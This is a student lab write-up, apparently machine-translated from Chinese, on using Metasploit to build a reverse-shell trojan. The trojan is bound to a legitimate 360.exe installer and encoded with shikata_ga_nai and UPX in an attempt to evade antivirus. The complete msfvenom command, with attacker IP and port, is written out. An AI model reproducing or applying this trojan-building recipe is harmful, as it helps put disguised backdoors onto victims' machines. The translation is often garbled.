Metasploit Implement Trojan, bundle, no kill 1. Preliminary knowledge
(1) Metasploit
Metasploit is an open source security vulnerability detection Tool, called the Metasploit Framework, or MSF. MSF is a vulnerability framework that allows users to develop their own vulnerability scripts for testing. Architecture for Metasploit:
?????????? Photo Source play Metasploit Series (first episode)
Base library Files :
- Base libraries in Rex:metasploit to support different protocols, transformations, and socket processing
- MSF CORE: The library defines the framework and provides a basic application interface for Metasploit
- MSF Base: This library provides a simplified, user-friendly application interface to the Metasploit framework
Modules (Implementation code through the most core penetration testing capabilities loaded, integrated and externally provided by the Metasploit framework)
2. Experiments
(1) Select Attack load
Input msfconsole
into the Metasploit console:
Enter show payloads
to view all available attack payload information:
In this experiment we used windows/shell_reverse_tcp (a simple Bounce shell program, which is a command line that connects Target drone).
(2) Select Bundle file
You can create your own EXE files, or you can bundle them into other EXE files. This experiment chose bundle, I looked for 360 install software (360.exe)
(3) Avoid killing
Make a kill-free wooden malay bypass antivirus software detection. One way to avoid killing under the Meatsploit framework is to use the MSF encoder. msfvenom -l encoders
View the encoding method (not all encodings are available on Windows systems):
The experiment selected x86/shikata_ga_nai
:
(4) generation, bundling, kill-free implementation
Lab Environment:
Attack Kali Linux ip:192.168.177.133
Target drone win7 ip:192.168.177.1
Command explanation:
msfvenom -p windows/shell_reverse_tcp 使用shell_reverse_tcp攻击载荷LHOST=192.168.177.133 设置攻击者IP地址LPORT=8080 设置攻击者的监听端口,用于接收木马的链接请求-e x86/shikata_ga_nai 使用shikata_ga_nai的编码方式-x 360.exe 将木马捆绑在360.exe上-i 5 对目标进行5次编码-f exe 指定MSF编码器输出格式为exe-o /root/backdoor.exe 指定处理完毕后的文件输出路径
The following test, set up after the link to wait for the Trojan:
On the Win7 to run the production of good backdoor.exe, very sorry to be 360 Avira:
Encode multiple times in different ways:
After the operation is still 360 Avira:
Try shell processing again, input UPX see UPX Shell software parameters. upx -5 backdoor.exe
The Backdoor.exe is added to the shell (compression processing here, the inconvenience of shell is to change the size of the source file, experienced security personnel can easily find this difference):
Embarrassed...... Still be avira, you can see the name of the Trojan has changed:
The experiment encountered another problem is the Kali attack host on their own virtual machine Win7 is able to monitor the link into the Trojan, but then Wang Kali attack my Win7 (the same LAN) is not listening, his computer can ping my computer, but my ping does not pass his, Check that the firewall has been shut down, we suspect that the lab router may have made a security configuration.
Because it is the first contact with the security system and software, so this experiment thanks to Wang classmate's guidance, encountered the problem after careful pondering after the solution.
2017-2018-1 20179202 "Linux kernel Fundamentals and Analysis" 11th week assignment